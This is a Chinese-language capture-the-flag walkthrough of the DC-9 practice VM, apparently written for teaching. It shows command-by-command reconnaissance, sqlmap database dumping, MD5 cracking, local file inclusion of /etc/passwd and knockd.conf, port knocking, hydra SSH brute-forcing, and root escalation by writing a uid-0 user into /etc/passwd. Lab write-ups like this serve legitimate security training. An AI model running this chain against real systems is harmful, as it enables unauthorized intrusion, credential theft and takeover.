DC系列靶场---DC 9靶场的渗透测试

信息收集

地址探测

使用arp-scan 对目标主机做地址探测

arp-scan -l -I eth0

目标主机IP地址为172.30,1,134

端口扫描

使用nmap对目标主机做端口扫描

nmap -sS -sV -T4 -p- -O 172.30.1.134

目标主机开放了80端口，但是22端口是过滤。这个22端口应该是关闭的，只是要有一定的条件才可以开启。。

-sS  nmap的SYN扫描，又叫秘密扫描，是nmap的默认扫描

-sV  对服务版本做检测

-T4  野蛮的扫描（常用）

-p-  对所有端口进行扫描

-O  对服务器版本做检测

http探测

访问目标主机web

这里是不是看着很像Drupal，典型的障眼法。

找找网站看看有没有交互式的地方。

这里有个用户信息，这个信息肯定有用

还有个搜索表单，这种表单非常容易受到SQL注入的攻击。

还有个登录地址，但是现在还不知道用户名和密码。

我们复制捕获的请求并将其粘贴到一个文本文件中，并将其命名为DC9.txt。我们这样做是为了将捕获的请求与sqlmap一起使用。现在，我们将启动sqlmap来检查搜索表单是否容易受到SQL注入的攻击。

漏洞查找及利用

SQL注入

对保存的文本文件进行SQL注入攻击，爆破数据库

sqlmap -r DC9.txt --dbs

-r 指定Burpsuite保存的地址

获取数据库中的所有记录

sqlmap -r DC9.txt -D Staff --dumap-all

--dump—all //获取数据库的所有记录

这里不知道咋回事，显示了明文密码，可能是破解过的原因吧

看一下这个密码是什么加密方式，这是一个交互式的。

hash-identifier

MD5报文摘要算法加密的

MD5破解

免费破解MD5网站

破解到密码为：transorbital1

登录后台

用户名admin，密码transorbital1

以管理员什么登录

提醒“文件不存在”。这意味着页脚中必须包含一个文件，但该文件现在丢失或放错位置了。我们知道，在有include函数的地方，我们有可能找到一个LFI漏洞

尝试使用传参查看账户文件

172.30.1.134/welcome.php?file=../../../../etc/passwd

发现确实存在文件包含漏洞

端口敲门

这是我们偶然发现的knockd.conf。这意味着涉及到端口敲门。我们可以看到在这里用一个序列配置了openSSH。我们注意到这个序列，并按此序列敲打SSH端口，以启动并运行它。 这个想法非常安全。

172.30.1.134/welcome.php?file=../../../../etc/knockd.conf

需要分别7469，8475，9842这个三个端口。说白了就是审讯这个三个，让22端口来就他们。

nc -z 172.30.1.134 7469 8475 9842

nmap -p22 172.30.1.134

这个直接使用nc -z 敲打一下这个三个端口。

再次扫描发现果然这小子open了。

SSH爆破

首先尝试了admin这个用户进行ssh登录发现登不上。

那这个时候我们想到在进行sql注入攻击的时候，还发现了一个users的数据库

sqlmap -u "http://172.30.1.134/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1'-D 'users' --dump

看到有一大串用户名个密码，我们将用户名分别放到一个文本文件中，

使用hydra进行ssh爆破

hydra -L user.txt -P passwd.txt ssh:172.30.1.134

User:janitor  passwd:Ilovepeepee

janitor用户

登录到janitor用户

这里全是隐藏文件和目录所以需要ls-la查看

这里我们看到一个password文件，打开之后看到好多个秘密，我把密码放到我们的passwd文件中。

再进行ssh暴力破解

hydra -L user.txt -P passwd.txt ssh:172.30.1.134

又多了一个用户，login: fredf   password: B4-Tru3-001

Fredf用户

登录到fredf用户

sudo -l

这里有个Linux安全的小技巧

我们使用ssh登录的这几个用户都采用了这个方法

.bash_history -> /dev/null 这里的意思就是把历史命令重定向到垃圾桶了。

只要用户一注销历史命令也跟着消失。

提权

脚本提权

发现这里有个脚本文件可以无密码以root用户权限执行，我们进入/opt/devstuff/dist/test目录下先看看有什么信息，全是文件，回到上一个目录查看，也没什么，再回到上一个目录查看，在/opt/devstuff目录下发现了一个test.py脚本文件

查看脚本的内容

cat test.py

这是一个写入文件的脚本，生成一个密码用root权限执行脚本写入/etc/passwd文件，所以我们现在就需要构造一个拥有root权限的用户，并且在/etc/passwd文件中储存，只要使用这个用户登录后，就可以获取到root权限，事先参考/etc/passwd解释

openssl passwd -1 -salt xiaoxiao 123456

echo 'xiaoxiao:MD5(密码):0:0::/root:bin/bash' > /tmp/xiao

sudo /opt/devstuff/dist/test/test /tmp/xiao /etc/passwd

先利用openssl命令创建一个密码，得到hash密码我们切换到tmp目录下，新建一个文件再回到/opt/devstuff/dist/test目录，执行程序test，将xiao的文件内容写入到/etc/passwd文件里面可以看到xiaofeixia用户已经添加到/etc/passwd文件里了，接下来然后使用命令su - xiao切换到我们添加的xiao用户，输入之前设置好密码即可登录

切换到root工作目录，得到flag。

cd /root

ls

cat theflag.txt

总结

1、扫描到22端口被过滤、网站主页很像Drupal，这个两个其实是个障眼法。

2、网站中的搜索表单容易受到SQL注入攻击，碰到这种表单可以试一下SQL注入。

3、通过Sqlmap爆破到密码，要了解加密方式再进行破解。

4、DC9也存在文件包含漏洞，依然是根据网站页脚判断。

5、knockd.conf这个文件是端口敲门的配置文件。要访问三个端口使22端口打开。

6、拿到shell后如果什么文件也没有，那就有可能是隐藏文件。

7、软连接历史命令重定向到垃圾桶，这个历史命令也是信息收集的一项。

8、最重要的还是信息收集，收集用户下的敏感文件，很可能里面就存在密码。

9、生成一个密码用root权限执行脚本写passwd文件，要构造一个拥有root权限的用户。要了解passwd的格式。